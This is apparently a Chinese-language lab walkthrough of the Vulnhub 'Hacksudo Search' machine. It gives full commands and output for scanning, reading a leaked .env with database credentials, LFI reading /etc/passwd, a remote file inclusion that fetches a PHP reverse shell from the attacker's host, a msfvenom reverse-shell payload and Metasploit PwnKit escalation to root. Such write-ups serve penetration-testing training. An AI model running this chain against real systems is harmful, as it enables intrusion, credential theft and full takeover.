Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)
Hacksudo Search识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count LenMAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60Unknown vendor
192.168.56.10008:00:27:f5:05:04 1 60PCS Systemtechnik GmbH
192.168.56.16208:00:27:b8:ce:1e 1 60PCS Systemtechnik GmbH 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.162
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-24 21:30 EDT
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 7b:44:7c:da:fb:e5:e6:1d:76:33:eb:fa:c0:dd:77:44 (RSA)
| 256 13:2d:45:07:32:83:13:eb:4e:a1:20:f4:06:ba:26:8a (ECDSA)
|_256 21:a1:86:47:07:1b:df:b2:70:7e:d9:30:e3:29:c2:e7 (ED25519)
80/tcp openhttp Apache httpd 2.4.38 ((Debian))
|_http-title: HacksudoSearch
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:B8:CE:1E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.71 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/robots.txt
/* find me * im number 1 search engine .
just joking :)
www.hacksudo.com
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ nikto -h http://192.168.56.162
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.162
+ Target Hostname: 192.168.56.162
+ Target Port: 80
+ Start Time: 2023-04-24 22:26:53 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /account/: Directory indexing found.
+ OSVDB-3092: /account/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /.env: .env file found. The .env file may contain credentials.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-04-24 22:27:52 (GMT-4) (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? nikto发现目录/account/,该目录下虽然有众多文件,但是访问这些文件,返回均为空。
nikto另外发现了/.env,
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/.env
APP_name=HackSudoSearch
APP_ENV=local
APP_key=base64:aGFja3N1ZG8gaGVscCB5b3UgdG8gbGVhcm4gQ1RGICwgY29udGFjdCB1cyB3d3cuaGFja3N1ZG8uY29tL2NvbnRhY3QK
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!该文件包含了数据库连接用户名和密码,但是该用户名不能用于SSH
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ ssh hiraman@192.168.56.162
The authenticity of host '192.168.56.162 (192.168.56.162)' can't be established.
ED25519 key fingerprint is SHA256:dzS9ujCpu8ohIPbqCaxf4e6gi5YSgBrhAI8srwr1giU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/)? yes
Warning: Permanently added '192.168.56.162' (ED25519) to the list of known hosts.
hiraman@192.168.56.162's password:
Permission denied, please try again.
hiraman@192.168.56.162's password: ──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.162
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,bak,js,sh
[+] Timeout: 10s
===============================================================
2023/04/24 22:31:27 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403)
/.php (Status: 403)
/images (Status: 301) [--> http://192.168.56.162/images/]
/index.php (Status: 200)
/search.php (Status: 200)
/submit.php (Status: 200)
/assets (Status: 301) [--> http://192.168.56.162/assets/]
/account (Status: 301) [--> http://192.168.56.162/account/]
/javascript (Status: 301) [--> http://192.168.56.162/javascript/]
/robots.txt (Status: 200)
/LICENSE (Status: 200)
/search1.php (Status: 200) Gobuster工具扫描出文件/search1.php,访问该文件,其中contact,作者给出提示,需要FUZZ参数,因此接下来用wfuzz工具进行FUZZING
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ wfuzz -c -u 'http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 288
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.162/search1.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001129: 200 143 L 260 W 3797 Ch "me" FUZZ出参数名称为me
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ curl http://192.168.56.162/search1.php?me=../../../../../../etc/passwd
<body >
<font color=white>
<atarget="_blank" href="https://www.cnblogs.com/?find=home.php">Home</a>
<a target="_blank" href="https://www.cnblogs.com/?Me=about.php">About</a>
<a target="_blank" href="https://www.cnblogs.com/?FUZZ=contact.php">Contact</a>
<form action="submit.php">
<input type="text" placeholder="Search.." name="search">
<button type="submit"><i ></i></button>
</form>
<h1><font color=red>HackSudo</font> Search box</h1>
<p>JumpStation The web crawler with Google</p>
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:*:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:*:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:*:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
hacksudo:x:1000:1000:hacksudo,,,:/home/hacksudo:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
monali:x:1001:1001:,,,:/home/monali:/bin/bash
john:x:1002:1002:,,,:/home/john:/bin/bash
search:x:1003:1003:,,,:/home/search:/bin/bash
</form>
</font>
<font color=red><h2><marquee> <a target="_blank" href="https://www.hacksudo.com/">Visit --> www.hacksudo.com</marquee></h2></a>
</font>
</body>
</html>看是否存在SSH私钥文件
http://192.168.56.162/search1.php?me=../../../../../../home/search/.ssh/id_rsa经过测试3个普通用户均不存在ssh私钥文件。
接下来看是否有远程文件包含漏洞:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/test.txt经过尝试,目标存在远程文件包含漏洞,因此在Kali linux端准备好shell.php文件,并启动http.server
访问下述URL:
http://192.168.56.162/search1.php?me=http://192.168.56.230:8000/shell.php在Kali linux上得到目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ sudo nc -nlvp 5555
password for kali:
listening on 5555 ...
connect to from (UNKNOWN) 55864
Linux HacksudoSearch 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
22:00:50 up 40 min,0 users,load average: 0.01, 1.18, 1.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@HacksudoSearch:/$ cd /home
cd /home
www-data@HacksudoSearch:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x6 root root 4.0K Apr 152021 .
drwxr-xr-x 18 root root 4.0K Apr 112021 ..
drwxr-x---6 hacksudo hacksudo 4.0K Apr 152021 hacksudo
drwxr-x---2 john john 4.0K Apr 132021 john
drwxr-x---2 monali monali 4.0K Apr 132021 monali
drwxr-x---2 search search 4.0K Apr 152021 search提权
利用msfvenom工具生成payload,将payload上传至目标主机/tmp目录,然后执行该文件
─(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]
└─$ msfvenom -plinux/x86/meterpreter/reverse_tcpLHOST=192.168.56.230 LPORT=6666 -f elf -o escalate.elfmsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
NameCurrent SettingRequiredDescription
--------------------------------------
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current SettingRequiredDescription
---- ----------------------------------
LHOST yes The listen address (an interface may be specified)
LPORT4444 yes The listen port
Exploit target:
IdName
------
0 Wildcard Target
msf6 exploit(multi/handler) > set LHOST 192.168.56.230
LHOST => 192.168.56.230
msf6 exploit(multi/handler) > set LPORT 6666
LPORT => 6666
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.230:6666
[*] Sending stage (989032 bytes) to 192.168.56.162
[*] Meterpreter session 1 opened (192.168.56.230:6666 -> 192.168.56.162:33994) at 2023-04-24 22:51:21 -0400
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
#Name Disclosure DateRank CheckDescription
----- ------------------- ----------------
0post/multi/recon/local_exploit_suggester normalNo Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > usepost/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current SettingRequiredDescription
---- ----------------------------------
SESSION yes The session to run this module on
SHOWDESCRIPTIONfalse yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.162 - Collecting local exploits for x86/linux...
[*] 192.168.56.162 - 167 exploit checks are being tried...
[+] 192.168.56.162 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.56.162 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.56.162 - exploit/linux/local/su_login: The target appears to be vulnerable.
[*] Running check method for exploit 48 / 48
[*] 192.168.56.162 - Valid modules for session 1:
============================
# Name Potentially Vulnerable?Check Result
- ---- -----------------------------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
3 exploit/linux/local/su_login Yes The target appears to be vulnerable.选择提权模块,然后提权
msf6 post(multi/recon/local_exploit_suggester) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcpmsf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec): Name Current SettingRequiredDescription ---- ---------------------------------- PKEXEC_PATH no The path to pkexec binary SESSION yes The session to run this module on WRITABLE_DIR/tmp yes A directory where we can write filesPayload options (linux/x64/meterpreter/reverse_tcp): Name Current SettingRequiredDescription ---- ---------------------------------- LHOST10.0.2.15 yes The listen address (an interface may be specified) LPORT4444 yes The listen portExploit target: IdName ------ 0 x86_64msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 192.168.56.230LHOST => 192.168.56.230msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 8888LPORT => 8888msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 1SESSION => 1msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.56.230:8888
[*] Running automatic check ("set AutoCheck false" to disable)[!] Verify cleanup of /tmp/.aqmsnondyug[+] The target is vulnerable.
[*] Writing '/tmp/.esjvtiaf/vswplcef/vswplcef.so' (548 bytes) ...[!] Verify cleanup of /tmp/.esjvtiaf
[*] Sending stage (3020772 bytes) to 192.168.56.162[+] Deleted /tmp/.esjvtiaf/vswplcef/vswplcef.so[+] Deleted /tmp/.esjvtiaf/.qbbgfqf[+] Deleted /tmp/.esjvtiaf
[*] Meterpreter session 2 opened (192.168.56.230:8888 -> 192.168.56.162:40940) at 2023-04-24 22:55:08 -0400meterpreter > shellProcess 1145 created.Channel 1 created.id uid=0(root) gid=0(root) groups=0(root),33(www-data)cd /rootlsnotes.txtroot.txtcat notes.txt _ _ _ _| |__ __ ____| | _____ _ ___| | ___ ________ _ _ __ ___| |__| '_ \ / _` |/ __| |/ / __| | | |/ _` |/ _ \/ __|/ _ \/ _` | '__/ __| '_ \| | | | (_| | (__|
页:
[1]